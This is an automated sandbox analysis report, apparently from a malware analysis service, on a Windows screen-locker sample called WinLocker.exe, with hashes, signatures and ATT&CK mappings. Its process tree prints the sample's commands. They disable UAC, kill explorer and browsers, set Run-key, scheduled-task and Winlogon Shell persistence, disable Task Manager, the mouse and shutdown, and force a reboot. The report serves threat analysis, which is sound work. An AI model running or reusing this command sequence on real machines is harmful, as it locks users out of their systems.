Analysis
-
max time kernel
27s -
max time network
28s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06/08/2024, 03:05
Static task
static1
Behavioral task
behavioral1
Sample
WinLocker.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
WinLocker.exe
Resource
win10v2004-20240802-en
Errors
General
-
Target
WinLocker.exe
-
Size
51KB
-
MD5
ef11087c3d5a51ee2a163673e0a2d945
-
SHA1
76437300dea9d4ec25661cd4acaeb8b7142c996f
-
SHA256
4dfb739b797ba68c266eaa5802404790f32a41155c7cf1559fd4b7174dd55471
-
SHA512
621f98c8f3e89250967f5742bd4e15a1d76ca30c141ae771f713d998f7181b3069f6cfcd685a84a27fa5cd89e26f4c54c4281f275e89de8f6cd2ae0fccd28725
-
SSDEEP
384:U6hgbJPtMyYRRUfZOI7ELTjjDCENXyu3bWCrWPWlR+ehoAi6gs:U1iBRKKdNXyurWiWPWlR+Or+s
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation WinLocker.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinBlocker.bat = "WinBlocker.bat" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 3348 timeout.exe -
Kills process with taskkill 6 IoCs
pid Process 4724 taskkill.exe 4024 taskkill.exe 3544 taskkill.exe 916 taskkill.exe 1632 taskkill.exe 972 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "184" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings WinLocker.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1576 schtasks.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 916 taskkill.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: SeDebugPrivilege 972 taskkill.exe Token: SeDebugPrivilege 4724 taskkill.exe Token: SeDebugPrivilege 4024 taskkill.exe Token: SeDebugPrivilege 3544 taskkill.exe Token: SeShutdownPrivilege 4940 shutdown.exe Token: SeRemoteShutdownPrivilege 4940 shutdown.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3052 LogonUI.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 116 wrote to memory of 1144 116 WinLocker.exe 83 PID 116 wrote to memory of 1144 116 WinLocker.exe 83 PID 116 wrote to memory of 4116 116 WinLocker.exe 84 PID 116 wrote to memory of 4116 116 WinLocker.exe 84 PID 4116 wrote to memory of 916 4116 cmd.exe 86 PID 4116 wrote to memory of 916 4116 cmd.exe 86 PID 4116 wrote to memory of 2396 4116 cmd.exe 88 PID 4116 wrote to memory of 2396 4116 cmd.exe 88 PID 4116 wrote to memory of 1632 4116 cmd.exe 89 PID 4116 wrote to memory of 1632 4116 cmd.exe 89 PID 4116 wrote to memory of 1252 4116 cmd.exe 90 PID 4116 wrote to memory of 1252 4116 cmd.exe 90 PID 4116 wrote to memory of 4592 4116 cmd.exe 92 PID 4116 wrote to memory of 4592 4116 cmd.exe 92 PID 4116 wrote to memory of 1996 4116 cmd.exe 95 PID 4116 wrote to memory of 1996 4116 cmd.exe 95 PID 4116 wrote to memory of 1576 4116 cmd.exe 96 PID 4116 wrote to memory of 1576 4116 cmd.exe 96 PID 4116 wrote to memory of 972 4116 cmd.exe 98 PID 4116 wrote to memory of 972 4116 cmd.exe 98 PID 4116 wrote to memory of 4724 4116 cmd.exe 99 PID 4116 wrote to memory of 4724 4116 cmd.exe 99 PID 4116 wrote to memory of 4024 4116 cmd.exe 100 PID 4116 wrote to memory of 4024 4116 cmd.exe 100 PID 4116 wrote to memory of 3544 4116 cmd.exe 101 PID 4116 wrote to memory of 3544 4116 cmd.exe 101 PID 4116 wrote to memory of 3140 4116 cmd.exe 102 PID 4116 wrote to memory of 3140 4116 cmd.exe 102 PID 4116 wrote to memory of 2704 4116 cmd.exe 103 PID 4116 wrote to memory of 2704 4116 cmd.exe 103 PID 4116 wrote to memory of 64 4116 cmd.exe 104 PID 4116 wrote to memory of 64 4116 cmd.exe 104 PID 4116 wrote to memory of 1020 4116 cmd.exe 105 PID 4116 wrote to memory of 1020 4116 cmd.exe 105 PID 4116 wrote to memory of 1172 4116 cmd.exe 107 PID 4116 wrote to memory of 1172 4116 cmd.exe 107 PID 4116 wrote to memory of 5112 4116 cmd.exe 108 PID 4116 wrote to memory of 5112 4116 cmd.exe 108 PID 4116 wrote to memory of 3104 4116 cmd.exe 109 PID 4116 wrote to memory of 3104 4116 cmd.exe 109 PID 4116 wrote to memory of 876 4116 cmd.exe 110 PID 4116 wrote to memory of 876 4116 cmd.exe 110 PID 4116 wrote to memory of 1016 4116 cmd.exe 111 PID 4116 wrote to memory of 1016 4116 cmd.exe 111 PID 4116 wrote to memory of 4940 4116 cmd.exe 112 PID 4116 wrote to memory of 4940 4116 cmd.exe 112 PID 4116 wrote to memory of 3348 4116 cmd.exe 114 PID 4116 wrote to memory of 3348 4116 cmd.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\WinLocker.exe"C:\Users\Admin\AppData\Local\Temp\WinLocker.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mistake.vbs"2⤵PID:1144
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\WinBlocker.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\system32\taskkill.exetaskkill /F /IM wscript.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\system32\chcp.comchcp 650013⤵PID:2396
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:1252
-
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\admin.vbs3⤵PID:4592
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinBlocker.bat" /t REG_SZ /d "WinBlocker.bat" /f3⤵
- Adds Run key to start application
PID:1996
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "WinBlocker.bat" /tr "WinBlocker.bat" /sc ONLOGON /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:1576
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM browser.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\WinBlocker.bat" /f3⤵PID:3140
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:2704
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouclass" /v Start /t REG_DWORD /d 4 /f3⤵PID:64
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableShutdownButton /t REG_DWORD /d 1 /f3⤵PID:1020
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "WinBlocker.bat" /f3⤵PID:1172
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn "WinBlocker.bat" /f3⤵PID:5112
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /f3⤵PID:3104
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouclass" /v Start /t REG_DWORD /d 3 /f3⤵PID:876
-
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableShutdownButton /f3⤵PID:1016
-
-
C:\Windows\system32\shutdown.exeshutdown.exe -r -f -t 003⤵
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\system32\timeout.exeTIMEOUT /T 1 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:3348
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39bf855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3052
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5a9db076ab7a8353f5780e4f886a05a00
SHA1c5d63cbf5bf56af2b318567d9f569d0fa12b1089
SHA2564af762b49d65c5dedc3c5bdb8612bb259f50bd6fd4ef2cd42d318d851e1fbb7c
SHA512cb287d914dff629ec54badb33040390998a04c4f53b4448483546537aedc2bdd54f773f3624c5839f0de12083f8368444f04b79996435ad0f8403dec3a804852
-
Filesize
530B
MD5c6d9d0f3fa69288ffa37204d896f2e61
SHA11c811c7015ec83cd31514775c0d54ac48eaa8e3b
SHA2566ed74e29b9b099f70afac7725cf6d5465c78a669599f351837e38d1d3e8bcb98
SHA512a9185bbd723ccda39203b8a12df43e97eed6d2e318dd734b8367d258aae88ab94c86966b1cdfc705d80f455e316c3154820f7b51694adb1c2cdad967731fd17a